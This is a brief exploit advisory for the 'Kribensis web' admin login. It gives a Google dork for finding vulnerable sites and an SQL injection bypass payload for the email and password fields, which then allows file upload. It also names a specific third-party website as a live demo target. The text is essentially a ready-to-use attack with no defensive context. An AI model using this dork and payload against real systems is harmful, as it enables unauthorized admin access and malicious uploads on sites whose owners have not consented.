# Exploit Title: Kribensis web admin bypass & Upload file # Google Dork: intext:Powered by Kribensis web or intext:Powered by Kribensis web & inurl:member-login.php # Date: 2018-04-30 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.kribensis.in/ # Tested on: Linux #Contact With Me : Mkalim07@protonmail.com * Mkali07 #################################### #Examples: #example : http://www.site.com/member-login.php email: 'or''='@gmail.com password: 'or''=' and Upload file.... #demo: http://www.indianoptometricassociation.com/member-login.php #################################### Good luck